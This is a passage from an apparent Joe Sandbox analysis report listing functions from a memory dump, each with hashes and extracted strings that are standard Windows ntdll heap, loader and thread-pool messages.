                                            • Opcode ID: 25d3b6432f8f124ce1c082b48f4da78d87ee24b7fbb29150498da008a53905f8
                                            • Instruction ID: 6b72d90c103e135ee82cc14297402e2dd4add947f65432e816a03c70243e4ca2
                                            • Opcode Fuzzy Hash: 25d3b6432f8f124ce1c082b48f4da78d87ee24b7fbb29150498da008a53905f8
                                            • Instruction Fuzzy Hash: B6420F31A04382DFD755DF28C884A6ABBE5FF88604F0849ADF5E58B351DB34D841CB56
                                            Function 0109B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            • Opcode ID: 28664305b8bce75dc2bb4f46f879fcefd108074ac1608f4a657d18d3765129df
                                            • Instruction ID: 3e3708e1cab109de6710e8b1997f50b5eeefe69135fc222f03079482926fdc66
                                            • Opcode Fuzzy Hash: 28664305b8bce75dc2bb4f46f879fcefd108074ac1608f4a657d18d3765129df
                                            • Instruction Fuzzy Hash: 72C14A71A00215ABDF25CF69D8A4FBEBBE5EF45720F04C0A9EDC19B291DB708844E391
                                            Function 010B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                            • Instruction ID: feb53cec4fa3473b9beca9dadda0cf3fdb00662887f157bc39afcd49c63d61ef
                                            • Opcode Fuzzy Hash: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                            • Instruction Fuzzy Hash: 77912830A017159BEB69DF18D885BEE7BB5BF40B14F04017CEA90AB781DB799841CB91
                                            Function 0112F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 0-1745908468
                                            • Opcode ID: 8dc7022edcd4a23d37ad02c0da3d284fe3302bb9e4b1564adae6c0e6368bb2e8
                                            • Instruction ID: 0954fb57674ad1cc531f63fe4308ca19e424f0d7f276b08dd87d067e14ee7a2a
                                            • Opcode Fuzzy Hash: 8dc7022edcd4a23d37ad02c0da3d284fe3302bb9e4b1564adae6c0e6368bb2e8
                                            • Instruction Fuzzy Hash: 44912131A00662DFDB2ADFA8D440AADFBF2FF19704F15801DE495AB361CB759852CB14
                                            Function 0107645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • apphelp.dll, xrefs: 01076496
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
                                            • LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: 88f183e37b51d0bc30b37711181714b6b4dec3dc66bdcba323df5065a2a3b0fc
                                            • Instruction ID: 23270b7a567e93ae0e984c4b7beaff2064026ab67ca7a64a1550692b627b8d19
                                            • Opcode Fuzzy Hash: 88f183e37b51d0bc30b37711181714b6b4dec3dc66bdcba323df5065a2a3b0fc
                                            • Instruction Fuzzy Hash: FD51C0716187059FE724DF28C881AABB7E8FB84748F00092DF5D69B260D731E944DB97
                                            Function 010AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
                                            • RTL: Re-Waiting, xrefs: 010F031E
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                            • Instruction ID: dca3e31ebd55f8a39e541d04e3598202a79e495d0c1237423bda084d407f6697
                                            • Opcode Fuzzy Hash: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                            • Instruction Fuzzy Hash: 22E1FF306087429FE765CF68C881B6EBBE1BB88314F144A6DF6E58B6D2D774D844CB42
                                            Function 010A51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                            Download Yara Rule
                                            Strings
                                            • WindowsExcludedProcs, xrefs: 010A522A
                                            • Kernel-MUI-Language-Disallowed, xrefs: 010A5352
                                            • Kernel-MUI-Language-Allowed, xrefs: 010A527B
                                            • Kernel-MUI-Language-SKU, xrefs: 010A542B
                                            • Kernel-MUI-Number-Allowed, xrefs: 010A5247
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: b473890219a25717a8d75a816af651b33c06cfe446371ceb47ff54761adfadac
                                            • Instruction ID: e30ac4006a5c523141694620d0257106e9dbc6591d3257529e3a8fc237411175
                                            • Opcode Fuzzy Hash: b473890219a25717a8d75a816af651b33c06cfe446371ceb47ff54761adfadac
                                            • Instruction Fuzzy Hash: AEF14A72D00619EFCB11DFA9C984AEEBBF9FF48610F50406AE585EB210E7709E008B90
                                            Function 010970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 3d2a202ba40022fe0c05d0aed0f09d32a13bc0af26e8c131e3d98b2e91e431a7
                                            • Instruction ID: 7c53453c9c74e201c919571df1e8f1d36bf9d3b6f2db3fc296596584de188815
                                            • Opcode Fuzzy Hash: 3d2a202ba40022fe0c05d0aed0f09d32a13bc0af26e8c131e3d98b2e91e431a7
                                            • Instruction Fuzzy Hash: 0513BF71A00259CFDF69CF68C4A07ADBBF1BF49304F1481AAD999AB381D734A845DF90
                                            Function 01091070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-3570731704
                                            • Opcode ID: 2235d1b5ac9e1affa32b5b8e92f8365a6c84b0eec6138b80d4eaa4c426678d44
                                            • Instruction ID: 32632fc6a580eeac5d51aec1677335eb3501bbc51630a687a4996b99de8549a9
                                            • Opcode Fuzzy Hash: 2235d1b5ac9e1affa32b5b8e92f8365a6c84b0eec6138b80d4eaa4c426678d44
                                            • Instruction Fuzzy Hash: D7926975A0122ACFEF65CB19CC54BA9B7F1BF45324F0581EAD989AB281D7309E80CF51
                                            Function 0108A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                            • Instruction ID: 9c4ba23efa58783345d96fea5747c7d8285d7fd0b62eb01fe1b139ab15d6f5c0
                                            • Opcode Fuzzy Hash: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                            • Instruction Fuzzy Hash: 90C18B7460C386CFDB11EF59C044B6AB7E4BF88704F04496AF9D58BA51E738CA49CB62
                                            Function 010B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
                                            • LdrpInitializeProcess, xrefs: 010B8422
                                            • @, xrefs: 010B8591
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010B8421
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                            • Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
                                            • Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                            • Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62
                                            Function 010864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                            • Instruction ID: c379ca71bd00ea4648c99ff449b635a176e1b912d1bc208ae837d59533b6eb90
                                            • Opcode Fuzzy Hash: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                            • Instruction Fuzzy Hash: 5971BFB19083059FCB61EF14C885B9B7FE8AF54764F400469F9C88B286D775D588CBE2
                                            Function 011311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 0-336120773
                                            • Opcode ID: 57db7dd82ca5599060c045b2fd6696a6ff4ab567e0af01a21fa3910263f55738
                                            • Instruction ID: 5e5cf29aac124d3d72c76ea1cb2ebb25814b5d5c5e9495ac097f234ea121dd6a
                                            • Opcode Fuzzy Hash: 57db7dd82ca5599060c045b2fd6696a6ff4ab567e0af01a21fa3910263f55738
                                            • Instruction Fuzzy Hash: 83314471210200FFD718DB98CC85FABBBE8EF45664F250059F895CB294EB31AC40CBA9
                                            Function 010A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • apphelp.dll, xrefs: 010A2462
                                            • LdrpDynamicShimModule, xrefs: 010EA998
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                            • Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
                                            • Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                            • Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80
                                            Function 01079148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            • Opcode ID: 7802a2c84e84d583802649aacf3d5b7c0f171fc65162e3836ba45273a809e11d
                                            • Instruction ID: d2242475b62ca09c9964263feac657a3a672b83eebc3fa04dd1d0f424e15db9b
                                            • Opcode Fuzzy Hash: 7802a2c84e84d583802649aacf3d5b7c0f171fc65162e3836ba45273a809e11d
                                            • Instruction Fuzzy Hash: 8A31A332A00205EFCB41DB59CC84FEEBBF8EF46A74F154059F994AB291DB70E940CA65
                                            Function 01081460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01081728
                                            • HEAP[%wZ]: , xrefs: 01081712
                                            • HEAP: , xrefs: 01081596
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: e454d1c153a1b8a8a379696f4add6bd1d9f5912895ce26c951284d4e95b87974
                                            • Instruction ID: ece3be167a32f3667d95c6df073a8d0c90a33b787c4ffebaee8881a3ecb0972a
                                            • Opcode Fuzzy Hash: e454d1c153a1b8a8a379696f4add6bd1d9f5912895ce26c951284d4e95b87974
                                            • Instruction Fuzzy Hash: F6E1DE30A086469FDB29DF6CC451ABABBF1BF48304F18849DE9D6CB246D734E942CB50
                                            Function 0107A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                            • Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
                                            • Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                            • Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54
                                            Function 0108B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-373624363
                                            • Opcode ID: 1042f4b5b5d35d2b50fd88ce30d15378cc20571a1dc323f436ac3b4de8cdce79
                                            • Instruction ID: c65d27b46449a6f857005d2d9d3ea9eb7c0b8aec21ae123828c03a77fa3d66bb
                                            • Opcode Fuzzy Hash: 1042f4b5b5d35d2b50fd88ce30d15378cc20571a1dc323f436ac3b4de8cdce79
                                            • Instruction Fuzzy Hash: 4491BD71A0821ACFEB21DF59C554BAEBBF0FF05318F144195E9D1AB290D7789A81CBA0
                                            Function 010B909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: 7fdd23d21dcebd485759c80cf6bde0bbf108921fed5a28fd504420637c39cd46
                                            • Instruction ID: f83b8dc6721c93335128fa5b006b0f8a16ed2583fa21757ac499a23a2f88b3c0
                                            • Opcode Fuzzy Hash: 7fdd23d21dcebd485759c80cf6bde0bbf108921fed5a28fd504420637c39cd46
                                            • Instruction Fuzzy Hash: D371BEB09093069FD714DF28C9C0AAFBBE5BF8461CF108A5DE6EA47691C730D905CB92
                                            Function 010A15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrmap.c, xrefs: 010EA59A
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 010EA589
                                            • LdrpCompleteMapModule, xrefs: 010EA590
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: f093432e1a3c7f287195a6d8d60e136083c553af396d4cbd9179f5db31886aec
                                            • Instruction ID: fe731de47371b9d7d506102539b78d18d5084820449ef52cd90ff98768eb1d5d
                                            • Opcode Fuzzy Hash: f093432e1a3c7f287195a6d8d60e136083c553af396d4cbd9179f5db31886aec
                                            • Instruction Fuzzy Hash: 16510331700741DFEB22DEADC948B6A7BE9BB08764F5801A4EAD1DB6D2C774E840CB40
                                            Function 0107758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: 389f4f7627e580be72ef362297046400271019c2410b89470dca0e5486c7bfa5
                                            • Instruction ID: cca89b507ed3f641119b84df4c10198a19cb78083a8affd75e9627b70dfa9cf8
                                            • Opcode Fuzzy Hash: 389f4f7627e580be72ef362297046400271019c2410b89470dca0e5486c7bfa5
                                            • Instruction Fuzzy Hash: 4C4109B0B00380CFEF79CAADC4887B97BE19F05384F1884E9D5C68B69AD678D885C755
                                            Function 0113C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 0113C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
                                            • PreferredUILanguages, xrefs: 0113C212
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                            • Instruction ID: 7ed3cff642500e619548674884fa71a64e6513ad317ceadd8e0c3c71d58677c0
                                            • Opcode Fuzzy Hash: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                            • Instruction Fuzzy Hash: CE416372E00219EBDF15DBD8C851FEEBBB9AB94700F14406BEA49F7244D7749A448B90
                                            Function 01114144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                            • Instruction ID: 2311db793bfb4142fe3cb5bb7f6940a0ad1542722bcd070725b8b640904ac47a
                                            • Opcode Fuzzy Hash: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                            • Instruction Fuzzy Hash: 9D4126319002588BEB29DBE8D850BEDFBB4FF55B40F240469D941EFB85D7349941CB51
                                            Function 010B33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlCreateActivationContext, xrefs: 010F29F9
                                            • Actx , xrefs: 010B33AC
                                            • SXS: %s() passed the empty activation context data, xrefs: 010F29FE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            • Opcode ID: c500aec88a13d910490fd123c2407b0fa1605aef0580041c59348d4fcd41373b
                                            • Instruction ID: 5dce3b71c68514201bae275c19c87ee4619e94dc6219c67f2e5659d609157448
                                            • Opcode Fuzzy Hash: c500aec88a13d910490fd123c2407b0fa1605aef0580041c59348d4fcd41373b
                                            • Instruction Fuzzy Hash: 7D312432600306DFEB26DE58C8C1BDB7BA4FB44710F2544A9EE449F281DB74E845CB90
                                            Function 0110B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                            Download Yara Rule
                                            Strings
                                            • GlobalFlag, xrefs: 0110B68F
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0110B632
                                            • @, xrefs: 0110B670
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: a6c3802dbc48c10204ffc82b03a80c8795a42d05e5556d6be16d1ac2a2f8ef03
                                            • Instruction ID: b0c9b1649c08a679497566c9cfdaea57878b91034f45155959a9d6d841848ece
                                            • Opcode Fuzzy Hash: a6c3802dbc48c10204ffc82b03a80c8795a42d05e5556d6be16d1ac2a2f8ef03
                                            • Instruction Fuzzy Hash: 10314DB5E0020AAFDB15EFA5CC80AEFBB7CEF44744F140469E605A7190D7749E40CBA8
                                            Function 010C1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 010C127B
                                            • BuildLabEx, xrefs: 010C130F
                                            • @, xrefs: 010C12A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction ID: 6100a7f401405c84a1a960f4b495f4daf7f9172c1c0e9d058ec8d4ee37f9b37f
                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction Fuzzy Hash: AC31A17290061DEFDB12AF95CC44EDEBFBDEB94B14F004029FA54A7660D7319A059F90
                                            Function 011020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
